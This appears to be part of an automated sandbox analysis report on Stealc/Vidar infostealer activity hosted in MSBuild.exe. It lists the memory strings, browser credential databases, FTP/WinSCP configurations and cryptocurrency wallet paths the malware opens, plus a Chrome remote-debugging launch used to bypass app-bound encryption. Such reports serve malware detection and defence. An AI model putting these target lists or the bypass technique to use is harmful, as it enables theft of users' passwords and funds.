Source: MSBuild.exe, 00000003.00000002.1839342332.00000000013B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: *wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*
Source: MSBuild.exe, 00000003.00000002.1839342332.00000000013B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: MSBuild.exe, 00000003.00000002.1839342332.00000000013B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Exodus\exodus.wallet\
Source: MSBuild.exe, 00000003.00000002.1839342332.00000000013B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: multidoge.wallet
Source: MSBuild.exe, 00000003.00000002.1839342332.00000000013B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: seed.seco
Source: MSBuild.exe, 00000003.00000002.1839342332.00000000013B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
Source: MSBuild.exe, 00000003.00000002.1839342332.00000000013B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Electrum-LTC\wallets\
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\temporary\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\sessionstore-backups\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\bookmarkbackups\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived\2023-10\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\to-be-removed\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\db\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\events\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\security_state\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\pending_pings\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\saved-telemetry-pings\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\minidumps\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\events\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\default\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\tmp\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.db Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Exodus\backups\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 6904, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 2212, type: MEMORYSTR

Remote Access Functionality
barindex
Attempt to bypass Chrome Application-Bound Encryption
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Yara detected Stealc
Source: Yara match File source: 32.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000020.00000002.2340668311.0000000001027000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.2338379546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 2212, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 6904, type: MEMORYSTR
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E1307A sqlite3_transfer_bindings, 32_2_61E1307A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E2D5E6 sqlite3_bind_int64, 32_2_61E2D5E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E2D595 sqlite3_bind_double, 32_2_61E2D595
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E0B431 sqlite3_clear_bindings, 32_2_61E0B431
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E037F3 sqlite3_value_frombind, 32_2_61E037F3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E2D781 sqlite3_bind_zeroblob64, 32_2_61E2D781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E2D714 sqlite3_bind_zeroblob, 32_2_61E2D714
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E2D68C sqlite3_bind_pointer, 32_2_61E2D68C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E2D65B sqlite3_bind_null, 32_2_61E2D65B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E2D635 sqlite3_bind_int, 32_2_61E2D635
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E2D9B0 sqlite3_bind_value, 32_2_61E2D9B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E2D981 sqlite3_bind_text16, 32_2_61E2D981
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E2D945 sqlite3_bind_text64, 32_2_61E2D945
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E2D916 sqlite3_bind_text, 32_2_61E2D916
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E2D8E7 sqlite3_bind_blob64, 32_2_61E2D8E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E038CA sqlite3_bind_parameter_count, 32_2_61E038CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E158CA sqlite3_bind_parameter_index, 32_2_61E158CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E038DC sqlite3_bind_parameter_name, 32_2_61E038DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61E2D8B8 sqlite3_bind_blob, 32_2_61E2D8B8